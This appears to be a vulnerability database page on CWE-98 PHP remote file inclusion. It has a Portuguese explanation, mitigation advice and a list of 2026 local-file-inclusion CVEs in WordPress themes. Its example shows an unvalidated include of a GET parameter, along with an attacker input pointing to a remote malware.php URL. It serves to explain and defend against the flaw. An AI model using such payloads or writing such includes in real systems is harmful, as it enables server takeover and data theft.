Weaknesses of type CWE-98

1,305 results

Inclusão remota de arquivo

Ocorre quando a aplicação inclui dinamicamente um arquivo (via funções como `include()`, `require()` em PHP) sem validar corretamente a entrada do usuário. Um atacante fornece uma URL remota maliciosa e consegue executar código arbitrário no servidor, comprometendo completamente a aplicação.

Example

Uma página PHP recebe um parâmetro `page` e faz `include($_GET['page'])`. Um atacante passa `page=http://seuservidor.com/malware.php` e consegue executar o arquivo malicioso no contexto do servidor web, roubando dados ou instalando backdoors.

How to mitigate

Valide rigorosamente entrada de usuário: use lista branca de arquivos permitidos, não permita URLs remotas, desabilite as directives `allow_url_include` e `allow_url_fopen` no PHP, e sempre sanitize caminhos de arquivo.

CVE-2026-22424HIGHWordPress Shaha theme <= 1.1.2 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22405HIGHWordPress Overton theme <= 1.3 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22427HIGHWordPress GoTravel theme <= 2.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22415HIGHWordPress The Mounty theme <= 1.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22452HIGHWordPress Hoverex theme <= 1.5.10 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22512HIGHWordPress Roisin theme <= 1.2.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22494HIGHWordPress Good Homes theme <= 1.3.13 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-23801HIGHWordPress The Issue theme <= 1.6.11 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22414HIGHWordPress Marra theme <= 1.2 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22509HIGHWordPress Gioia theme <= 1.4 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22436HIGHWordPress Helvig theme <= 1.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22499HIGHWordPress Lella theme <= 1.2 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22408HIGHWordPress Justicia theme <= 1.2 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22502HIGHWordPress Mr. Cobbler theme <= 1.1.9 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22493HIGHWordPress Gaspard theme <= 1.3 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22389HIGHWordPress Cocco theme <= 2.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22498HIGHWordPress Laurent theme <= 3.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22437HIGHWordPress Playa theme <= 1.3.9 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-53335HIGHWordPress Berger theme <= 1.1.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22392HIGHWordPress Cortex theme <= 1.9 - Local File Inclusion vulnerabilityEPSS 0.5%